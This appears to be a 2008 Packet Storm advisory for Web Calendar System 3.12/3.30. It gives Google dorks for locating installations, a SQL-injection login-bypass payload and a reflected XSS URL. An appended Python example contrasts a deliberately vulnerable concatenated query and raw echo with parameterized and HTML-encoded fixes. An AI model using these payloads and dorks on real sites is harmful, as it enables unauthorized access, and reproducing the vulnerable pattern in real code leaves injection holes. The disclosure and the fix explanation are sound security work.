webcalsys-sqlxss.txt

2008-11-29T00:00:00
ID PACKETSTORM:72380
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2008-11-29T00:00:00

Description

                                        
`
  
  
  
[+] Script : Web Calendar System v 3.12/3.30  
  
[+] Exploit Type : Multiple Exploits (XSS + remote bypass Exploit)  
  
[+] Google Dork : intitle:Web Calendar system v 3.30 inurl:.asp  
[+] Google Dork : intitle:Web Calendar system v 3.12 inurl:.asp  
  
[+] Contact : blackbeard-sql@hotmail.fr  
  
  
--//--> Exploit :   
  
1) Remote Bypass Exploit (login bypass via SQL injection) :
  
http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM  
  
username:' or '1'='1  
  
password:' or '1'='1  
  
2) Remote XSS exploit :   
  
In simple words :  
  
http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]  
  
  
`
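The two issues above, modelled next to their fixes. This is an added example, not code from the advisory or from Web Calendar System: the table layout, the query shape, the page template and all function names are assumptions, since the product's source is not shown on this page.

```python
import html
import sqlite3

PAYLOAD = "' or '1'='1"  # value the advisory supplies for both login fields
STEXT = "<script>alert('constructed')</script>"  # constructed SText sample


def make_db():
    """Constructed in-memory user table (plaintext password only to keep the model small)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    # With PAYLOAD the WHERE clause ends in  OR '1'='1'  and matches every row.
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Hardened form: values are bound, so quotes inside them stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def render_search_raw(stext):
    """Assumed vulnerable pattern: the search term is echoed unencoded."""
    return "<p>Search results for: " + stext + "</p>"


def render_search_encoded(stext):
    """Hardened form: HTML-encode the term before writing it to the page."""
    return "<p>Search results for: " + html.escape(stext, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    print("concatenated login accepts payload: ", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized login accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print("raw search output:    ", render_search_raw(STEXT))
    print("encoded search output:", render_search_encoded(STEXT))
```

In classic ASP the corresponding fixes are an `ADODB.Command` with bound parameters for the login query and `Server.HTMLEncode` on `SText` before it is written to the response.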